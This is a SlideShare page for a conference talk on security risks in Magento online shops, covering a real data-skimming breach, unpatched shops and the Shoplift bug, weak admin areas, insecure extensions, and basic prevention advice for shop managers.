Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.
What could possibly go wrong?
Security in Magento Shops
• integer_net (Aken / Germany)
• Consultant / Developer / Trainer ...
PHOTO
Real Life Example
• One line of code added
• Reads all requests in admin and
checkout areas
• Encodes and stores dat...
PHOTO
Real Life Example
• Active for 6 months!
• 5,628 datasets
(email address, name, telephone)
• 1,612 passwords
• All a...
Overview
Consequences of Attacks
Types of Attack
Prevention
PHOTO
What can possibly
go wrong?
Consequences of Attacks
PHOTO
www.ibm.com/security/data-breach/
PHOTO
Stolen User Data
PHOTO
Stolen Login Data
PHOTO
Stolen Payment Data
PHOTO
This guy lost more than 50,000 $
in a data breach
PHOTO
Server Attacks
PHOTO
PHOTO
PHOTO
How can this happen
with Magento?
Vulnerabilities
PHOTO
Magento Unpatched
• Neither installed the latest version
• Nor applied important security patches
• (Insecure PHP ve...
PHOTO
Example: Shoplift Bug
(patched February 2015)
PHOTO
50,581
Source: byte.nl, April 2016
Magento shops vulnerable to Shoplift:
(out of 255.558)
PHOTO
Weakly secured Admin Area
• http://magento.site/admin/
• http://magento.site/downloader/
• Username “admin”
• Low se...
PHOTO
What can an Attacker do
with Admin Access? (1)
1. Log in
2. Upload a custom extension in the Magento
Connect Manager...
PHOTO
What can an Attacker do
with Admin Access? (2)
1. Log in
2. Inject custom JavaScript in System
=> Configuration
PHOTO
PHOTO
Security issues in extensions
• Custom or purchased extensions
• SQL Injection, XSS, …
• Backdoors
• Installation se...
PHOTO
How can I
prevent Attacks?
PHOTO
1. Follow basic Guidelines
• Update Magento and PHP
• Secure the admin area
• Subscribe to the security mailing list
PHOTO
2. Check your Site
PHOTO
3. Do security reviews
Severe security issues found in
more than 50% of my reviews
PHOTO
Q & A
Please contact me!
@avstudnitz avs@integer-net.com
@integer_net www.integer-net.com
What could possibly go wrong? Security in Magento Shops
Nächste SlideShare
Wird geladen in …5
×

What could possibly go wrong? Security in Magento Shops

951 Aufrufe

Veröffentlicht am

Stolen customer data, unreachable shops, blackmailings - there is a long list of possible attacks on Magento shops. Andreas von Studnitz, doing Magento shops since 2008, talks about successful and attempted attacks, about security vulnerabilities and other risks. Learn what you as a shop manager can and should do to protect your shop against attacks of all kinds.

Veröffentlicht in: Internet
  • Als Erste(r) kommentieren

What could possibly go wrong? Security in Magento Shops

  1. 1. What could possibly go wrong? Security in Magento Shops • integer_net (Aken / Germany) • Consultant / Developer / Trainer / CEO • Specialist for Magento and Solr • @avstudnitz PHOTO Andreas von Studnitz
  2. 2. PHOTO Real Life Example • One line of code added • Reads all requests in admin and checkout areas • Encodes and stores data in media/cache_6e0a32[…]d53ee065da
  3. 3. PHOTO Real Life Example • Active for 6 months! • 5,628 datasets (email address, name, telephone) • 1,612 passwords • All admin usernames and passwords
  4. 4. Overview Consequences of Attacks Types of Attack Prevention
  5. 5. PHOTO What can possibly go wrong? Consequences of Attacks
  6. 6. PHOTO www.ibm.com/security/data-breach/
  7. 7. PHOTO Stolen User Data
  8. 8. PHOTO Stolen Login Data
  9. 9. PHOTO Stolen Payment Data
  10. 10. PHOTO This guy lost more than 50,000 $ in a data breach
  11. 11. PHOTO Server Attacks
  12. 12. PHOTO
  13. 13. PHOTO
  14. 14. PHOTO How can this happen with Magento? Vulnerabilities
  15. 15. PHOTO Magento Unpatched • Neither installed the latest version • Nor applied important security patches • (Insecure PHP version)
  16. 16. PHOTO Example: Shoplift Bug (patched February 2015)
  17. 17. PHOTO 50,581 Source: byte.nl, April 2016 Magento shops vulnerable to Shoplift: (out of 255.558)
  18. 18. PHOTO Weakly secured Admin Area • http://magento.site/admin/ • http://magento.site/downloader/ • Username “admin” • Low security passwords
  19. 19. PHOTO What can an Attacker do with Admin Access? (1) 1. Log in 2. Upload a custom extension in the Magento Connect Manager (downloader)
  20. 20. PHOTO What can an Attacker do with Admin Access? (2) 1. Log in 2. Inject custom JavaScript in System => Configuration
  21. 21. PHOTO
  22. 22. PHOTO Security issues in extensions • Custom or purchased extensions • SQL Injection, XSS, … • Backdoors • Installation service
  23. 23. PHOTO How can I prevent Attacks?
  24. 24. PHOTO 1. Follow basic Guidelines • Update Magento and PHP • Secure the admin area • Subscribe to the security mailing list
  25. 25. PHOTO 2. Check your Site
  26. 26. PHOTO 3. Do security reviews Severe security issues found in more than 50% of my reviews
  27. 27. PHOTO Q & A Please contact me! @avstudnitz avs@integer-net.com @integer_net www.integer-net.com

×